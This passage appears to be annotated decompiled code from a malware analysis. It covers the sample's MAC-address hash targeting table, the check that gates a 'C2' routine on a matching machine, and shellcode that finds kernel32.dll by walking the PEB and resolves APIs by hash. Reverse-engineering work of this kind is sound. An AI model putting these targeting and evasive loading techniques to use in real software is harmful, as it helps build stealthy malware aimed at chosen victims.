md5s_of_macs[15].padding2[3] = 0; md5s_of_macs[16].count = 2; md5s_of_macs[16].md5mac1[0] = 0xf39dda09; md5s_of_macs[16].md5mac1[1] = 0xadaf50a0; md5s_of_macs[16].md5mac1[2] = 0x96eff00d; md5s_of_macs[16].md5mac1[3] = 0xe2b6413b; md5s_of_macs[16].padding1 = 0; md5s_of_macs[16].md5mac2[0] = 0x6ab0e3fa; md5s_of_macs[16].md5mac2[1] = 0xf2b7fb2; md5s_of_macs[16].md5mac2[2] = 0x7fbf297c; md5s_of_macs[16].md5mac2[3] = 0x3ff8032b; md5s_of_macs[16].padding2 = 0; md5s_of_macs[17].count = 1; md5s_of_macs[17].md5mac1[0] = 0x6758b9d4; md5s_of_macs[17].md5mac1[1] = 0x5dbf471f; md5s_of_macs[17].md5mac1[2] = 0x5d7008cd; md5s_of_macs[17].md5mac1[3] = 0x539ade80; md5s_of_macs[17].padding1 = 0; md5s_of_macs[17].md5mac2[0]._0_1_ = 0; md5s_of_macs[17].md5mac2._1_4_ = 0; md5s_of_macs[17].md5mac2._5_4_ = 0; md5s_of_macs[17].md5mac2._9_4_ = 0; md5s_of_macs[17]._37_4_ = 0; md5s_of_macs[17].padding2._1_2_ = 0; md5s_of_macs[17].padding2[3] = 0; md5s_of_macs[8].md5mac1[3]._1_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; md5s_of_macs[10].md5mac2[0]._2_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; md5s_of_macs[10].md5mac2[2]._3_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; md5s_of_macs[10].md5mac2[3]._3_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; mac_cnt = md5_mac(NULL,1,func_ptrs); if (mac_cnt != 0) { dwSize = (mac_cnt + 5) * 0x14; buffer = (*func_ptrs->VirtualAlloc)(NULL,dwSize,0x3000,4); (*func_ptrs->memset)(buffer,0,dwSize); mac_cnt2 = md5_mac(buffer,0,func_ptrs); if (mac_cnt2 != 0) { (*func_ptrs->memset)(&md5s_of_thismachine,0,0x2c); matched = cmp_md5(func_ptrs,(int *)md5s_of_macs,buffer,mac_cnt2,&md5s_of_thismachine); if (matched == 0) { no_match(func_ptrs,0,mac_cnt2); } else { C2(&md5s_of_thismachine,func_ptrs); } } } return; } // WARNING: Unknown calling convention yet parameter storage is locked // SHELLCODE ENTRY FUNCTION this will: // 1. Get kernel32.dll // 2. resolve imports // 3. execute payload int entry(void) { IMAGE_DOS_HEADER *dllbase; int GetProcAddress; int import_resolution_success; _LDR_DATA_TABLE_ENTRY_0x10 *ldr_entry; NT_TIB *local_FS_OFFSET__1; bool bVar1; LDR_DATA_TABLE_ENTRY *local_64; int func_ptr_table [21]; void *kernel32_dllbase; _LIST_ENTRY *flink; wchar_t *dll_name; _LDR_DATA_TABLE_ENTRY_0x10 *next_entry; // 1. get kernel32.dll // 1.1. iterate over InInitializationOrderModuleList // 1.2. match 1th, 6th and 9th character of module with `k`, `l`, `.` ... this matches // `kernel32.dll` flink = (local_FS_OFFSET__1->Self->ProcessEnvironmentBlock->Ldr->InInitializationOrderModuleList). Flink; ldr_entry = (_LDR_DATA_TABLE_ENTRY_0x10 *)flink->Flink; if ((_LDR_DATA_TABLE_ENTRY_0x10 *)flink->Flink != (_LDR_DATA_TABLE_ENTRY_0x10 *)flink) { while (local_64 = (LDR_DATA_TABLE_ENTRY *) ((int)&(ldr_entry->MappingInfoIndexNode).unlabelled0 + 4), (ldr_entry->BaseDllName).Length != 0) { // match the name of the module by comparing the 1st, 6th and 9th characters. This matches // kernel32.dll dll_name = (ldr_entry->BaseDllName).Buffer; if (((((*dll_name == L'k') || (*dll_name == L'K')) && ((dll_name[5] == L'l' || (dll_name[5] == L'L')))) && (dll_name[8] == L'.')) || (next_entry = (_LDR_DATA_TABLE_ENTRY_0x10 *)(ldr_entry->InInitializationOrderLinks).Flink, bVar1 = next_entry == ldr_entry, ldr_entry = next_entry, bVar1)) break; } } // get the dll base (in this case of the matched kernel32.dll) dllbase = (IMAGE_DOS_HEADER *)local_64->DllBase; // resolve LoadLibraryExW via the hash 431a42c9 and store in func_ptr_table[0] // also resolve c2cbc15a = GetProcAddress if (((dllbase != NULL) && (func_ptr_table[0] = getAddrByHash(dllbase,0x431a42c9), (LoadLibraryExW *)func_ptr_table[0] != NULL)) && (GetProcAddress = getAddrByHash(dllbase,0xc2cbc15a), GetProcAddress != 0)) { // resolve the imports import_resolution_success = import_resolution((func_ptr_table_t *)func_ptr_table); if (import_resolution_success == 0) { return 0; } // execute the payload // payload((func_ptr_table_t *)func_ptr_table); } return 1; }